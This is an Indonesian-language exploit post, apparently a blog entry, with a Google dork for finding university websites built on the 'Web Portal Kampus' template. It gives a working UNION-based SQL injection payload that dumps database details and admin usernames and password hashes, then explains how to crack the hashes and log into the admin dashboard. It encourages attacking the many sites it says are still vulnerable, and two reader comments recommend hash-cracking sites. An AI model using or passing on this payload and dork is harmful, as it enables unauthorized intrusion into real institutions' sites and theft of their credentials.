[+] Exploit Title: Template Web Portal Kampus Swarakalibata SQL-Injection Vulnerability
[+] Author: ./Sn00py
[+] Team: N45HT
[+] Google Dork:
"inurl:/page/detail/kata-sambutan site:id"
[+] Tested on: Windows 10 pro
[+] Vendor: https://phpmu.com
=======================================
[+] Proof Of Concept:
Pertama, kalian harus mencari tahu apakah situs memakai template Web Portal Kampus, Jika situs tersebut memakai templatenya maka akan seperti ini tampilannya.
(Nb: Gambar diatas hanya contoh)
Jika sudah valid memakai template web portal kampus, langsung kalian cek apa di situs tersebut memiliki fitur pencarian kata kunci dan jika kalian memasukkan string ', ada peringatan A Database Error Terjadi maka itu adalah vuln.
Langsung saja kalian memasukan exploit dibawah, Dan taraaa muncul admin password tinggal kalian decrypt deh.
[+] Exploit:
' and false union select 1,2,3,concat(0x496E6A65637465647E,0x3c62723e,0x56657273696f6e203a3a3a20,version(),0x3c62723e,0x55736572203a3a3a20,user(),0x3c62723e,0x4461746162617365203a3a3a20,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,username,password)),@)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -
passwordnya type SHA512 ya jadi kalian tinggal decrypt aja, Nah kan muncul lagi MD5 jadi kalian decrypt lagi.
dan taraaa password found!
[+] Find login admin
Administrator
Admin
Adminweb
Jika sudah login terserah deh mau ngapain kalo udah di dashboard admin ^^
[+] Demo? No Demo ^^ Happy Hacking~
Gimana cukup mudah bukan? btw ini masih banyak yang vuln loh tinggal kembangin aja dorknya. Oke mungkin cukup sekian dari saya dont forget too share and see you next time byee~
Greetz: Khatulistiwa - RSFLT - N45HT - PacmanCorp - AllindonesiaDefacer
Link web buat decrypt sha gan
ReplyDeletehashkiller.co.uk disini juga ada mas
Delete